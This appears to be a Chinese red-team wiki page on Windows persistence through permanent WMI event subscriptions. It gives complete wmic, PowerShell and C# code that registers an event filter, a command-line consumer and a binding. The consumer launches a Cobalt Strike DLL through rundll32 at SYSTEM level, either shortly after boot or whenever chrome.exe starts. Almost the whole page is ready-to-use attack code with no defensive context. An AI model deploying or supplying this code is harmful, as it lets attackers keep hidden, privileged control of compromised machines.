WMI事件

WMI事件

WMI事件,是特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。

利用代码

命令行:

#注册一个事件过滤器,该过滤器是开机2分钟到2分半钟,由于是永久WMI事件订阅,故需要管理员权限,最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

Powershell:

$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams

C#:

using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
  class Program
  {
    static void Main(string[] args)
    {
      PersistWMI();
    }
    static void PersistWMI()
    {
      ManagementObject myEventFilter = null;
      ManagementObject myEventConsumer = null;
      ManagementObject myBinder = null;
      String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
      String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
                           "WHERE TargetInstance ISA \"Win32_Process\" " +
                           "AND TargetInstance.Name = \"chrome.exe\"";
      try
      {
        ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
        ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
        WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
        myEventFilter = wmiEventFilter.CreateInstance();
        myEventFilter["Name"] = "BugSecFilter";
        myEventFilter["Query"] = myEventQuery.QueryString;
        myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
        myEventFilter["EventNameSpace"] = @"\root\cimv2";
        myEventFilter.Put();
        myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
        myEventConsumer["Name"] = "BugSecConsumer";
        myEventConsumer["CommandLineTemplate"] = CommandLine;
        myEventConsumer.Put();
        myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
        myBinder["Filter"] = myEventFilter.Path.RelativePath;
        myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
        myBinder.Put();
      }
      catch (Exception e)
      {
        Console.WriteLine(e);
      }
      Console.ReadKey();
    }
  }
}

参考文章:

最后更新于